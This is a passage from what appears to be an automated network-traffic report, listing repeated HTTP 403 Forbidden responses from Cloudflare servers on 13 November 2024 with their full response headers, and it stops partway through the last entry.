            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4CEvNqd1v0qYqo6RQznhEInlRAWxV3pk2KvGxBeHx4aN80RVWcAbvStI%2BrYqrmeiuWsBkAzo7tPhGpbkOTi0SK0P338Dzhyv9FWZ%2FnVzfFTbdtaWtSfy6g2dkEaibgx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071c33fb1685d-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=132792&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20103&cwnd=32&unsent_bytes=0&cid=47b11e534a4395f7&ts=795&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=looL4GtvGtqxvJGrm30yz67anykEXAnUj5QKUxtvWzIwSlGE4QXXlOOetn0HNJx5O3A0w2PqKIPjiWua5LVqGSLhtII5Q8flFpcBOLbQCptSMDJNNIlLw13x%2BDicwIGT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071cdaa86d74f-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=131167&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=22087&cwnd=32&unsent_bytes=0&cid=b863c50b1855407b&ts=500&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7hNIQVOpAzqNsdNNHBHV%2FvFwndl2u2sxsybbCGkIYB3DP57B2a%2FUze6zFwxiBbdHxdNgf%2BzcrPpucygnzt%2FwCVTd%2FQJKp12ZSyJAIRjgsCNSzimWHxnveGuWll3zKyHu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071d67c24d77c-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=130451&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22215&cwnd=32&unsent_bytes=0&cid=94ba1ae2536a3aa2&ts=541&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJKkUz73wRceL473RknB4%2BPgUgX12fygoQM2NXTN00Sysh1fFnIfvhZ3y1ivctuJBd%2Bfv9WX4R1kDx2FjE9WOnbUhNrrn5xMgmn4swu5JpCRDVhhj9vL8vawGopGuXG7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071dd5a64e817-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1137&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=2375717&cwnd=251&unsent_bytes=0&cid=868425edc2d6e922&ts=281&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMlMh02vCQU%2FlII1ulaV2haT7STWruKNjwRC4%2Fw7%2B9ttYl6wUE%2BKBnt4Y0dyASecOQE%2BdGn6ZNVukm1yUcZjIz4y0hZQd9PQ3qvr%2BvXlURCvSbCvdUkd9VIVaFWKoUrM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071e74f26261d-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=159367&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=19117&cwnd=32&unsent_bytes=0&cid=88ab9a15cedb4e4c&ts=836&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NNMlHNXzpfNwQZAx9lMXuoSJ%2BGnRnbXldxWkFOJPK8HQFVAwn8oLiSZ88DDZnMQQ6JIIj0Loy%2BkgZ0qSwm8zWTd0Z1RJGtdl7WOeSqKXNSb2BuyUh1uJbaHLhrP51Yxu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071f82e2ad765-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=130920&sent=4&recv=6&lost=0&retrans=1&sent_bytes=2828&recv_bytes=1167&delivery_rate=22214&cwnd=32&unsent_bytes=0&cid=d534c45c318cfaa6&ts=514&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ENnTiihMrRpFRybnPpJyEoMSGd%2BnF2faMZWuA4G1euuaPmASzKur3lq3B2U1EGNdN97Od1pS1W%2F00Blc5WU76yKXe%2FMU01zUo0RkTKjAQGRbtH11fCjJGvXvHwaIUIzc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071ff4dd42cc2-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1634&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=1754088&cwnd=237&unsent_bytes=0&cid=80d1d0944f5e918d&ts=493&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Icly1E73rBXSNTUncto87nreNkMCmzxbo3fAnS6bkdah65AWJdp3pOif6rSeVodUd78RNEp4jcxjHfBCH%2FtkF0UBiqgxXDA0jvn8Fr7KrscghBUjNlchEHJPMNM2r5Pi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072085ba2e367-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=152031&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=18114&cwnd=32&unsent_bytes=0&cid=22fa5661142b8342&ts=744&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlGxf%2BGx%2FDm7xhKQsFSkoDUs6HHfZCHK%2BAYx7K9xEnJKoTmMtSXq%2BzJnRwG1wbdDxVPyKnpdD6gov5mv5aZx%2F%2B1q%2F6AMdEZga08auoxynq8nhWRKfcRYIRLwy3sn9y%2F1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207213696650d8-BODalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114495&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=25300&cwnd=32&unsent_bytes=0&cid=020e660828833674&ts=525&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8irEKmTOZqI9GT1%2Fi4ivCm1%2FktY1QM9j4E058tFjJ0meN69YUCrFbVXJ%2FFKaBb1aYaJKnm2Gsyzy5E0zTukDsKaagc6WoDNnu2tWqXD09KBYnigAheRaAnsFRVb2Ff2y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20721b88ea685a-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=171015&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20061&cwnd=32&unsent_bytes=0&cid=7a1ede1f5e5229a1&ts=793&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OHaq2CNWANcNurjJGs9Ja4p6dtRPGMa5spfj5lRTwUJyuz71DOdOo6HeirIlMkjM3PKe1s9CqosLR0VE8DdQkonFPMKZGIjQOc9kknnfw0viXYPA%2BZXfjCVvlkQHeMia"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072248c38fa05-SJCalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=41184&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=70223&cwnd=32&unsent_bytes=0&cid=0e647d344df4be39&ts=494&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2UylY2yyLd8krg4QAWQA7%2FMpDEEDflZiGfmWW2%2FUGhAsHGoDq0kxc4N8Y6sMvVX8J42CceKjFqTF5%2Fy6nLzUK2mSMFfwmYHkYYsN7rarGwUlDNFUZCjC0C3w03AelW6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20722c09d3c997-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=38217&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=75835&cwnd=32&unsent_bytes=0&cid=fac6eaae224df6ed&ts=378&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kyUeVC7pn%2BgIuEr6wGwsbUPMkVimrai8OwfULubgUOjsW13vRpxADbw2DUgMQcaVovQdwKkBdGR%2Fqmkh5dt83t8UWvd%2BdAPonVy3KT423bou1ZDM%2FOa8R%2FCVn4nrHdB3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072346d842089-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=158042&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=20104&cwnd=32&unsent_bytes=0&cid=37b8b5597b73db18&ts=826&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1D%2B2uFAu8wuBJoGf8cRuydwJSBoEZK%2BfqDJsqohKH%2BtBflxiouudMXTOXtKuBeulOwApCadRnzy9AUwEbhRI5T4Dph6imPDsooD1kCVYsoPqsCRLct5Dw8uQiCWcCwH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20723f7ccfd773-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=149219&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18709&cwnd=32&unsent_bytes=0&cid=9e747e29bab49cac&ts=533&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=00Cl7wKBZ7yV9cbh0d4dK5aSn4k9yT1wMhtcNQ7RqPFHdpq9f9Ahf%2FdZH1bUTbutbKDy3nFHEnSIHcQ%2FFl1STYfj5O39yCLkrTb4SKd6Rw%2Fr0GLwMvrgOe0DBVXR3Wz1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207246286f2c86-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1512&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2023759&cwnd=235&unsent_bytes=0&cid=330b978d0d1a4d06&ts=309&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cIsHCbJE1VTrBXvCfTIouycG0j8PfXHS8JKqwP5QVmLktwEth5RAJUIcUJKCpomc%2Bd0yLm7xrI6XzMXVyfKDIUx%2FUGD0ZXYoYuOf09XFVDay3AdeFLOrf13bHMQYbhA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20724ebc837372-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=166823&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=14790&cwnd=32&unsent_bytes=0&cid=00d9681dae08b3b4&ts=582&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=monfumrc7VHXqkomkrIvIZe%2FRHjcZyB2TZSs9dS43RiCxTOCNj8VRp1LzP8Txlrlgln01y%2BzU8BYDpgHBmgMsqh470SpVZSr3iC02G0nUV9nnBJKXDTHC2GK9FpzC410"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072578bd8d761-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21049&cwnd=32&unsent_bytes=0&cid=e53bcc705fcab88e&ts=1241&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F6pYaYF214rnQtg64g8L6p6AL9LspkjxnVvl%2FId2AYBLSJKWi1rxSX2LydKU2wcH%2FAmVntqpdHvWcQlbcycetsatnHuovII783CcJR6KbhyFFEHacZ%2BzitzPNyBDLVMC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072636a6bc979-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=33447&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=86626&cwnd=32&unsent_bytes=0&cid=da1362e8537745c5&ts=286&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGHHpDIDBXY2ts8C6KRtMUd%2FdgBdVjj%2BDKak8YTJ1m77jf7JQm82kt0wP7Rftyn6Ymu0toZMQo6YMFKYs6Ux2Z3i90PCwHVCdmYMT8W89Wp6UHAmfpPE6nCTCN4dJe57"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20726efa546b06-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1313&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2360228&cwnd=236&unsent_bytes=0&cid=6e26bb5a99c475d5&ts=1426&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53FK1MbVdP2exh9R30Zbk6wUIj0r9cdGiJEouY9XFL5YFoYuayPQEQL0%2FLNzqWzw72Zgu5iDF%2FzsHbFIk04nzdwXPVMZ%2BOFncGxuZnHtrCrDQRcNzUeFnZJz3fHaFz8n"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072779d65d744-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=130818&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=22142&cwnd=32&unsent_bytes=0&cid=56f90b16cfacd2ba&ts=505&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sDwovdz1JJdMtieF51S4hW2OaKNbVPuLAZv1W8B6JSTPqDI9%2FrSNtPu2IaPoEqdX5ERzePuHxLiLxr1pv%2Fee9N%2BTFjwRZruV2KzxaDDkoYuYsaD39Mtsh9WOVOUebuY9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207281082f230e-SJCalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=41539&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=69692&cwnd=32&unsent_bytes=0&cid=4f6311489d8c8a45&ts=649&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8tFLPmqI799PnVeBOrq5G5ZXAMN6sjSzNTOcBhKuiHacpHIge4bmsDB7A6gBXEQ9I5TCD6VzQUzpKjQ23r2YwtumxUU5xw99TerBLalDxEsW1QvmHoUGFJQieEjbSOd7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20728b5edfd773-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137262&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=21077&cwnd=32&unsent_bytes=0&cid=0dc08ebf919023c0&ts=507&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nSy34c9HeRGYq1rso4OjG3DbafnyF3HcR4LJzS6%2B8EkflOWT1vQ2dPE1xON9f30KM0IzfEgx%2FN9sDiVeDEdii1NoYMzM3f0a%2Fw1toPlx9AVinICfYUm9EmcwwQkXE36"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072932fe9c991-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=33698&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=85843&cwnd=32&unsent_bytes=0&cid=242a4841e244cbd9&ts=379&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ugTmQJwoSTRLngQursOqTYXHNAD%2FbK3wnmoQwVwbfcW4W%2BQ9B0WoxujjHmJ4eg5tRu0HHaxBaXQ5u7oAS7veuAeSl%2BzgSREM22vjTQkjj5VHRnWm1ZplJXGUeZDLeg24"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20729d987ad754-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=142391&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18051&cwnd=32&unsent_bytes=0&cid=353bf2596d3dc2ed&ts=868&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtKpxvxrnx3yBfmjwSLQcAOLxc520cXHDYngWBt5NM8LaldTRbJXWrV5v1aRMWaaSCtHfBaAzZuSm96b9RnA3aJAfsNAANF1wMeBmdJHB5oxnbKRrI%2BUYWPnjNwYfPet"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072a68da0d788-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137469&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=21056&cwnd=32&unsent_bytes=0&cid=d54b3113894ee5f0&ts=550&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=acQqXazriKixtSRErgKXYHINiJgj84YMNHGkGFYHNJungNXei4EnEFzpSwIR6R9bTvyCoqoNNLXd6yE5eyqtlX%2FZLhwz0vrnKs%2Fu4ktygz8gWlbcfdc03yaxksnNVAqU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072adfc01c9ad-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=34535&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=83883&cwnd=32&unsent_bytes=0&cid=32c78d7787abab5b&ts=276&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2FKxvvLq0z1pnKTbamai0hYAGNMx2URWKEW5LmRezYKImECxHMNyTXb%2BB7J5%2FwFx7Z%2BvzLkSNPhL6hdfM1xfIx32dWXoe8fUu%2B6vaIdT5yxgT0LifnIojDNCJ6TWAVG1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072b5dff8aff3-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=144356&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=17493&cwnd=32&unsent_bytes=0&cid=bfb7b3b6bc45a5b3&ts=626&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cSCNW9txY29WhwKOJ0uSgGvWJ82zsiHsaSjWWDbeypUyYa2%2BiH70zzO%2F5AepQLci1s0SefYitC1PmzpjdhZ%2FpGeI7FuZYk8nPMmyYjOlEAgA57hRE%2Fy1G5%2FJGW%2FpXiQa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072bd1d646c80-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1962&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1483606&cwnd=251&unsent_bytes=0&cid=06bcf1c192d78d40&ts=406&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Io%2BxfrBrKy5I6J13uaLBQm%2BZUKBKUvKw6vD9nuvhChW5CL5yklHSuzH9yp9TFAK6jlgSxabaGu8UqoVDwuEwkkHDA%2B1F52oPI3aGtto9EcywPZVHn1us0KwRNRRBf5sL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072c58a6ce387-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=141013&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20577&cwnd=32&unsent_bytes=0&cid=d270895326dc000b&ts=818&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vwx71jEP%2Bnq%2BzAbVTEnchr4c5SrwZxAw8ImT1K%2F2YBZIPGr5DO%2BfForNYG%2BwHrqfLEgJJXsuWuBO%2FSZMeFXbuAUXzGXXIeuVQhZXe%2BrGq2rsJ2idB0eaTQrz058HNyCo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072d1bb3bd79c-NRTalt-svc: h3=":443"; ma=86400server-timing: 